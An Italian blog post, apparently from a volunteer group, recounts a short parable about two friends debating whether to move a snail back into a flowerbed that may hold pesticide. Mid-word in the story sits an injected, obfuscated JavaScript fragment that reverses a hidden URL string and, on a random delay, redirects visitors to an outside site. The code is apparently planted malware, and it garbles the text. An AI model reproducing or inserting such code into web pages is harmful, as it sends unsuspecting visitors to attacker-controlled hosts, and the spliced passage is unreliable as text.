La direzione della chiocciola

image_pdfimage_print

Pochi giorni fa sono venuti a trovarci un gruppo di ragazzi di Milano. Durante il nostro incontro ci hanno chiesto quali erano le motivazioni che ci spingevano a fare qualcosa per gli altri, gli abbiamo risposto con questa breve storia che vogliamo condividere anche con voi.
Un giorno due amici stavano cammin (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando in un parco, mentre discorrevano del più e del meno, uno di loro vide una chiocciola sul selciato davanti a lui.
La prima reazione fu prenderla in mano e rimetterla nell’aiuola dalla quale sembrava provenire.
Dopo aver compiuto questo gesto, sorridente per la buona azione che aveva appena eseguito si girò verso l’amico.
Rimase molto sorpreso nel vedere che l’altro, sorridendo, scuoteva la testa. Chiese il motivo di tale comportamento e l’altro gli spiegò che forse la chiocciola era appena fuggita da quella aiuola per evitare un pesticida che era stato buttato lì dai giardinieri, e che con enorme fatica era riuscita a scappare da quella trappola mortale.
Il nostro eroe rimase un po’ soprappensiero, la sua fronte si corrugò, ci penso un altro po’, poi si girò e si mise a cercare la chiocciola nell’aiuola dove l’aveva appena messa per riporla in mezzo alla strada; d’altra parte, continuò il suo amico, non si poteva sapere se era destino della chiocciolaessere trovata da un bischero che l’avrebbe rimessa dove era, inoltre non sapevano nulla con certezza, nemmeno l’eventuale presenza del pesticida.
A quelle parole si bloccò all’istante, nella scomoda posizione in cui si trovava, si voltò e vide il sorriso del suo amico farsi ancora più ampio.
Si rialzò e si rimisero a camminare assieme.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *